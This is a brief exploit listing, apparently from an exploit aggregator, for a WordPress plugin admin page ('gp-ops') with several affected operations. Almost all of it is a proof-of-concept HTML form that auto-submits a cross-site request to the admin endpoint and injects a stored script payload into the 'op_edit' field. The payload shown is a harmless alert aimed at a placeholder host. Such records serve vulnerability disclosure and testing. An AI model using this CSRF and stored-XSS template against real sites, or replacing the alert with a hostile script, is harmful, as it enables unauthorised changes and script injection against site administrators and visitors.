Share
## https://sploitus.com/exploit?id=WPEX-ID:3E262CD7-CA64-4190-8D8C-38B07BBE63E0
Affected pages: op=engines, op=perspectives, op=modes, op=genres, op=themes, op=platforms

<form action="https://example.com/wp-admin/admin.php?page=gp-ops&op=modes&id=test" method="post" name="test">
   <input type="text" name="op_edit" value="<script>alert('xss')</script>">
<button type="submit"></button>
</form>
<script>
document.test.submit();
</script>